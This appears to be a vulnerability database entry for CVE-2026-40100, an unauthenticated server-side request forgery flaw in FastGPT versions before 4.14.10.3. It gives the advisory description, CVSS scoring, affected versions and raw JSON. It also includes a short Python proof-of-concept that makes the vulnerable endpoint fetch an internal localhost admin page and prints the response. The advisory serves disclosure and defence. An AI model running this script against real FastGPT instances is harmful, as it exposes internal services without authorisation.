Security Vulnerability Report
CVE-2026-40100 CVSS 5.3 MEDIUM

CVE-2026-40100

Published: 2026-04-10 17:17:13
Last Modified: 2026-04-15 19:02:57

Description

FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fastgpt:fastgpt:*:*:*:*:*:*:*:* - VULNERABLE
FastGPT < 4.14.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable FastGPT instance
target_url = "http://target-host/api/core/app/mcpTools/runTool"

# Malicious payload targeting an internal service (e.g., localhost admin panel)
payload = {
    "url": "http://127.0.0.1:8080/admin"
}

try:
    # Sending the unauthenticated request
    response = requests.post(target_url, json=payload, timeout=10)

    # Checking if the internal resource was accessed (SSRF indication)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: SSRF successful.")
        print("[+] Response from internal resource:")
        print(response.text)
    else:
        print("[-] Request failed or target patched.")
except Exception as e:
    print(f"[!] Error occurred: {e}")
```

References

https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40100",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T17:17:12.997",
    "lastModified": "2026-04-15T19:02:57.257",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-918" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fastgpt:fastgpt:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.14.10.3",
                "matchCriteriaId": "2E93E71B-0D3A-4C6D-9679-EC1FA760E111"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```